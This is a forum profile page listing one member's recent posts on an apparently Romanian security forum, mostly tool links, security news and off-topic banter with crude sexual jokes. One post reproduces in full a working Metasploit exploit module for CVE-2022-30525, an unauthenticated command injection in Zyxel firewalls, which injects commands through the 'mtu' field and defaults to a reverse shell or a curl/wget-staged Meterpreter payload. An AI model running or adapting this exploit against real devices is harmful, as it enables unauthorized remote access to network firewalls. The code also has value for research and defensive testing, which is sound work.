Jump to content

Kev

Active Members
  • Posts

    798
  • Joined

  • Days Won

    29

Kev last won the day on April 27

Kev had the most liked content!

Reputation

348 Excellent

5 Followers

About Kev

  • Rank
    Community Regular
    Community Regular

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. Kev

    TimelineCSS

    URL: https://www.timelinecss.io/top Author: joseph.michael.sample@gmail.com Source: www.timelinecss.io/
  2. Nu ma intereseaza CNP ( certificat de nastere), doar prenumele sa nu ma strige {$name hai sa ma regulezi}, nu fac fraude dar i-mi plac MILF-urile, daca e shemale nu conteaza, prenumele atat.
  3. Nu sunt toti afară uneori Multumesc
  4. Salut, imi pot schimba prenumele din actele de identitate (permis auto, C.I. certificat de nastere, etc...) Ma deranjeaza faptul ca am prenume comun si multe MILF-uri in cartier care isi striga copiii "$name hai la masã" iar unii din sotiile lor sunt plecati prin armatã si nu vreau sa ma trezesc cu teava-n cap. So, se poate? legal. Thanks
  5. Kev

    CVE-Tracker

    URLs: https://cvetrends.com/ https://cve.circl.lu/ Source: https://github.com/4D0niiS/CVE-Tracker
  6. Verdict-as-a-Service (VaaS) is a service that provides a platform for scanning files for malware and other threats. It allows easy integration in your application. With a few lines of code, you can start scanning files for malware. ATTENTION: All SDKs are currently prototypes and under heavy construction! Integration of Malware Detection Easily integrate malware detection into any kind of application, service or platform. Create a command line scanner to find malware with a few lines of code: Example Create a KDE Dolphin plugin to scan for malicious content with a few lines of code: Example Create a WordPress plugin that scans all file uploads for malware with a few lines of code: Example Create a Discord bot that scans and deletes malicious files uploaded on your Discord server with few lines of code: Example I'm interested in VaaS You need credentials to use the service in your application. If you are interested in using VaaS, please contact us. SDKs At the moment SDKs for Rust, Java, Typescript and PHP are available. Functionality Rust Java PHP TypeScript Check SHA256 ✅ ✅ ✅ ✅ Check SHA256 list ✅ ❌ ❌ ✅ Check file ✅ ✅ ✅ ✅ Check file list ✅ ❌ ❌ ✅ Documentation Documentation for the SDKs is available in the corresponding SDK folder. Rust SDK, Examples Java SDK PHP SDK, Examples TypeScript SDK Planned SDKs The following SDKs are planned but not yet available: Swift and Perl. If you need SDKs for other languages, please create an issue or contribute an SDK with a pull request. Source
  7. This Metasploit module exploits CVE-2022-30525, an unauthenticated remote command injection vulnerability affecting Zyxel firewalls with zero touch provisioning (ZTP) support. By sending a malicious setWanPortSt command containing an mtu field with a crafted OS command to the /ztp/cgi-bin/handler page, an attacker can gain remote command execution as the nobody user. Affected Zyxel models are USG FLEX 50, 50W, 100W, 200, 500, 700 using firmware 5.21 and below, USG20-VPN and USG20W-VPN using firmware 5.21 and below, and ATP 100, 200, 500, 700, 800 using firmware 5.21 and below. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super( update_info( info, 'Name' => 'Zyxel Firewall ZTP Unauthenticated Command Injection', 'Description' => %q{ This module exploits CVE-2022-30525, an unauthenticated remote command injection vulnerability affecting Zyxel firewalls with zero touch provisioning (ZTP) support. By sending a malicious setWanPortSt command containing an mtu field with a crafted OS command to the /ztp/cgi-bin/handler page, an attacker can gain remote command execution as the nobody user. Affected Zyxel models are: * USG FLEX 50, 50W, 100W, 200, 500, 700 using firmware 5.21 and below * USG20-VPN and USG20W-VPN using firmware 5.21 and below * ATP 100, 200, 500, 700, 800 using firmware 5.21 and below }, 'License' => MSF_LICENSE, 'Author' => [ 'jbaines-r7' # Vulnerability discovery and Metasploit module ], 'References' => [ [ 'CVE', '2022-30525' ], [ 'URL', 'https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/'] ], 'DisclosureDate' => '2022-04-28', 'Platform' => ['unix', 'linux'], 'Arch' => [ARCH_CMD, ARCH_MIPS64,], 'Privileged' => false, 'Targets' => [ [ 'Shell Dropper', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_cmd, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' } } ], [ 'Linux Dropper', { 'Platform' => 'linux', 'Arch' => [ARCH_MIPS64], 'Type' => :linux_dropper, 'CmdStagerFlavor' => [ 'curl', 'wget' ], 'DefaultOptions' => { 'PAYLOAD' => 'linux/mips64/meterpreter_reverse_tcp' } } ] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true }, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS] } ) ) register_options([ OptString.new('TARGETURI', [true, 'Base path', '/']) ]) end # Checks the build date that is embedded in the landing page. If it finds a build # date older than April 20, 2022 then it will additionally check if the model is # a USG FLEX, USG20[w]?-VPN, or an ATP system. Command execution is blind so this # seems like a reasonable approach. def check res = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/')) unless res return CheckCode::Unknown('The target failed to respond to check.') end unless res.code == 200 return CheckCode::Safe('Failed to retrieve /') end ver = res.body[/favicon\.ico\?v=(?<build_date>[0-9]{6,})/, :build_date] if ver.nil? return CheckCode::Safe('Could not extract a version number') end if ver[0..5].to_i < 220420 model = res.get_html_document.xpath('//title').text if model.include?('USG FLEX') || model.include?('ATP') || (model.include?('USG20') && model.include?('-VPN')) return CheckCode::Appears("This was determined by the model and build date: #{model}, #{ver}") end end CheckCode::Safe("This determination is based on the build date string: #{ver}.") end def execute_command(cmd, _opts = {}) handler_uri = normalize_uri(target_uri.path, '/ztp/cgi-bin/handler') print_status("Sending command to #{handler_uri}") # this is the POST data. exploit goes into the mtu field. technically, `data` is a usable vector too # but it's more involved. http_payload = { 'command' => 'setWanPortSt', 'proto' => 'dhcp', 'port' => Rex::Text.rand_text_numeric(4).to_s, 'vlan_tagged' => Rex::Text.rand_text_numeric(4).to_s, 'vlanid' => Rex::Text.rand_text_numeric(4).to_s, 'mtu' => ";#{cmd};", 'data' => '' } res = send_request_cgi({ 'method' => 'POST', 'uri' => handler_uri, 'headers' => { 'Content-Type' => 'application/json; charset=utf-8' }, 'data' => http_payload.to_json }) # Successful exploitation can result in no response (connection being held open by a reverse shell) # or, if the command executes immediately, a response with a 503. if res && res.code != 503 fail_with(Failure::UnexpectedReply, "The target replied with HTTP status #{res.code}. No reply was expected.") end print_good('Command successfully executed.') end def exploit print_status("Executing #{target.name} for #{datastore['PAYLOAD']}") case target['Type'] when :unix_cmd execute_command(payload.encoded) when :linux_dropper execute_cmdstager end end end # 0day.today [2022-05-17] # Source
  8. Cybersecurity researchers have disclosed a massive campaign that's responsible for injecting malicious JavaScript code into compromised WordPress websites that redirects visitors to scam pages and other malicious websites to generate illegitimate traffic. This involved infecting files such as jquery.min.js and jquery-migrate.min.js with obfuscated JavaScript that's activated on every page load, allowing the attacker to redirect the website visitors to a destination of their choice. The GoDaddy-owned website security company said that the domains at the end of the redirect chain could be used to load advertisements, phishing pages, malware, or even trigger another set of redirects. In some instances, unsuspecting users are taken to a rogue redirect landing page containing a fake CAPTCHA check, clicking which serves unwanted ads that are disguised to look as if they come from the operating system and not from a web browser. The campaign — a continuation of another wave that was detected last month — is believed to have impacted 322 websites so far, starting May 9. The April set of attacks, on the other hand, has breached over 6,500 websites. Found this article interesting? Follow THN on Facebook, Twitter and LinkedIn to read more exclusive content we post. Source
  9. A Drama in Three Acts Security is perhaps the most neglected area of information technology. It is extensive, diverse and complex. It is political. It is ungrateful. It is a drama. An attempt to cope in three acts. About the Author The Author is working over 25 years in IT and mechanical engineering businesses as architect, developer, UNIX system/network administrator and entrepreneur. As cofounder of Micro-Colocation.com, his focus since 2021 has been on green edge computing for small computers. This colocation service was recently released and is happy to welcome any Raspberry Pi, Odroid, Jetson Nano and other Single Board Computer enthusiasts. CC licensed texts like this drama are created within the working hours of this company. You can support the text production by sharing the Micro-Colocation.com link in your network and, of course by booking colocation services. Many thanks. Table of Contents Prologue........................................................................................................................2 First Act.........................................................................................................................4 First Scene – The Dilemmas...............................................................................4 Second Scene – The Developer..........................................................................6 Third scene – The Allies......................................................................................7 Fourth Scene – The Concept............................................................................12 Second Act..................................................................................................................15 First Scene – The Application..........................................................................15 Second Scene – The Identification..................................................................18 Third Scene – The Access..................................................................................22 Fourth Scene – The Encryption.......................................................................24 Third Act.....................................................................................................................26 Last Scene: The Implementation.....................................................................26 Epilogue......................................................................................................................29 Please / Thank you...................................................................................................29 Props............................................................................................................................30 eBook Versions: English Translation: IT Security for Developers — A Drama in Three Acts | May 2022 Deutsche Originalversion, empfohlen für Muttersprachler: IT Sicherheit für Entwickler — Ein Drama in drei Akten | Mai 2022 Source
  10. sodha is a curated search engine for software engineers Link: https://sodha.dev Source
  11. Face figuri tema Sau poate este de la mine?! Opera: ctrl+shift+N
  12. Kev

    Useful stuff

    https://www.insanelyusefulwebsites.com Autor: jayra
  13. For those of you familiar with boolean operators and advanced search modifers in the likes of Google and Bing (I include Yahoo, Altavista, MSN and Live Search in this as they all run off Bing’s search engine as of last year); you will know that the extremely useful field command “inurl:” does not work in Microsoft’s Bing search engine. Microsoft temporarily suspended support of this field command back in 2007 due to “what appears to be mass automated usage for data mining”. They never brought it back. The inurl: field command is used by recruiters and sourcers alike to find public profiles in LinkedIn, search for CVs on the web and generally exploit patterns in web addresses that can lead to candidate information. Google have a virtual monopoly on this as they are the last major search engine left that still allow you to search within the url of a web address. Well, not any more. It turns out that Bing does allow you to search within the url of a web page, in fact they have a documented search command that allows you to search within the url, title, meta tags and much more with just one command. This nifty little command is called “instreamset” and allows you to specify key words that you wish to search for within either the url, title, body or anchors of a webpage. In fact it goes one step further and allows you to combine any of these meta tags in your search. Here’s an example: if you run the following search in Bing it will look for the letters “recruitment” in either the Title or Url of a web-page: instreamset:(url title):recruitment If you change this to just instreamset:url:recruitment then Bing will just search the url for these letters. I say letters as, unlike Google, Bing appears to search for the letters rather than treating our search paramater as a whole word. If you run a search for inurl:recruitment in Google, you tend only to see “recruitment” as a whole word in the url, preceded and followed by a special character such as / – . etc. This can be a pain when looking for CVs, for example, as they often appear in urls such as wwww.mycv.com which Google might not prioritise as it sees the whole word “mycv” rather than seeing “cv” as part of that term. Thankfully you can also filter words from the url by inserting the negative sign or hyphen in front of instreamset as follows: site:linkedin.com -instreamset:url:dir -instreamset:url:groups “java developer” In this example Bing filters out directory and group listings from our search for the public profiles of Java Developers. When searching for CVs you could run a search for the following when looking for Software Developers in Dublin: instreamset:(title url):cv “software developer” dublin -advice -jobs -sample -apply -description -submit This works very similarly to a Google search for (inurl:~cv | intitle:~cv) with Bing also searching for synonyms of CV such as resumé and “curriculum vitae”. Fundamentally Bing remains weak when it comes to indexing public LinkedIn profiles so it still doesn’t work as well as Google for LinkedIn searches but it does provide a great, comprehensive alternative to Google for finding CVs and other profile searches that would otherwise require a url search. Which search engine do you prefer to use and why? Source
  14. Kev

    Useful stuff

    https://fb.watch/cAHryojNZ3/
×
×
  • Create New...